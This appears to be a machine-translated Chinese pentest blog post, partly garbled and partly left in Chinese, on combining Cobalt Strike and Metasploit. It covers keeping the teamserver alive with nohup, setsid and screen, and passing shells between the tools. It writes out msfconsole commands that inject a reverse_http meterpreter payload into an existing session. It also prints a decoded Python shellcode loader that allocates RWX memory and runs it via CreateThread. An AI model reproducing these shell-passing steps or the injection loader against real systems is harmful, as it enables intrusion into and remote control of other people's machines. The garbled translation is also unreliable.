CS Remote Control has been very to the force, before engaging and MSF in conjunction with good results. . . A long time useless, forgotten. . . .
Saw the Prophet, we look at the collection. . .
Cobaltstrike teamserver persistence
Since we are operating in the terminal part of the process of child processes SSH, or SSH interrupted when the network connection is lost, the terminal will receive HUP (hangup) signal to close all child processes. In order to maintain the server Cobaltstrike wake up, we need to:
- Let the process to ignore HUP signal;
- Let the process run in the new session, the process becomes a child does not belong to this terminal.
In general, the first idea can nohup
command implementation, end with "&" command into the background can be run:
[root@Fazx ~]# nohup ping 0sec.com.cn &
[1] 3059
nohup: appending output to `nohup.out'
[root@Fazx ~]# ps -ef | grep 3059
root 3059 984 0 21:06 pts/3 00:00:00 ping 0sec.com.cn
The second idea is the corresponding setsid
command:
[root@Fazx ~]# setsid ping 0sec.com.cn
[root@Fazx ~]# ps -ef | grep 0sec.com.cn
root 31094 1 0 20:28 ? 00:00:00 ping 0sec.com.cn
We can see the process ID (PID) is 31094, and its parent ID (PPID) to 1 (ie, the init process ID), the current process is not the terminal ID.
Further, the command &
on ()
the execution may be achieved setsid
the same effect:
[root@Fazx ~]# (ping 0sec.com.cn &)
[root@Fazx ~]# ps -ef | grep 0sec.com.cn
root 3998 1 0 20:37 pts/4 00:00:00 ping 0sec.com.cn
In order to avoid a large number of repeat operations command, a command or a forgotten additional commands and so on, this article focuses recommended screen tool implementation requirements, it can be easily simulate multiple terminal windows, and all processes linked to child processes of init ( That idea 2). Man of few words said operating point of view:
# 首先安装screen
apt-get install screen
Enter screen
a new window, directly enter commands normally in this window, after the completion of use Ctrl + A + D key combination window into the background, it was found that the disengaged state of the session:
Use screen -ls
view background window, screen -r ID
restore the specified session:
screen -r 14662
The same, Metasploit listening port while waiting for a rebound shell, can be persistent in this manner, with respect to the operation nohup
much more convenient.
MSF spawn a shell to Cobaltstrike
Gets MSF shell, after the establishment of session execution in meterpreter background
session in the background, switching payload.
MSF shell attack machine has a built Cobaltstrike and the server does not need to be the same host port for remote communication can derive shell.
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST [Listener监听IP]
msf exploit(payload_inject) > set LPORT [Listener监听端口]
msf exploit(payload_inject) > set SESSION [session ID]
msf exploit(payload_inject) > exploit
Configuration set DisablePayloadHandler true
reason that will produce a new handler after payload_inject in the local execution, we've got a while before, do not need to generate.
Multiple session include all session while establishing and demand options when you want to shell derived:
End listener CS configured as follows:
windows/beacon_http/reverse_http
CS end broiler on-line success:
Cobaltstrike spawn a shell to MSF
After CS obtain a beacon shell, configure the listener
windows/foreign/reverse_tcp
Since then we have to pay attention to the MSF's windows/meterpreter/reverse_tcp
configuration remains the same, this is reverse_tcp
rather reverse_http
the same, configure IP and port should also be consistent with the MSF listening.
MSF provided in advance exploit/multi/handler
to listen to the reverse TCP connection, this step will not repeat them more conventional. Right-click on the need to derive the target selection Spawn, then select the corresponding listener.
The other end is connected to the shell MSF i.e. acquired later to obtain Meterpreter session:
After words
What needs to spawn a shell of scenario? Although CS First load module used to attack powerful but not as rich MSF, information can also refer to the less, this time need to continue MSF took over the shell subsequent penetration process; secondly CS type broiler primarily supports the Windows platform, payload also for Windows , which we can see the CS generated Scripted Web Delivery
in python type of load, as follows (the shellcode omitted) decoded:
import ctypes
import platform
(arch, type) = platform.architecture()
# 32-bit Python
if arch == "32bit":
shellcode = "xxxx"
# 64-bit Python
elif arch == "64bit":
shellcode = "xxxx"
else:
shellcode = ""
# sanity check our situation
if type != "WindowsPE" or len(shellcode) == 0:
quit()
# inject our shellcode
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
可以看到攻击代码中判断了WindowsPE,也就只能直接获取Windows shell。但通过派生shell我们可以使用MSF针对Linux的攻击载荷,获取Linux权限后接管到CS平台,从而拓展了团队协作渗透的广度与深度。
Cobaltstrike核心的功能还是后渗透阶段,免杀、内网中的横向移动、内网转发、C2配置文件等,后续的文章也会围绕这些内容进行展开。
写本文时值万圣节,Metasploit也更换了主题banner: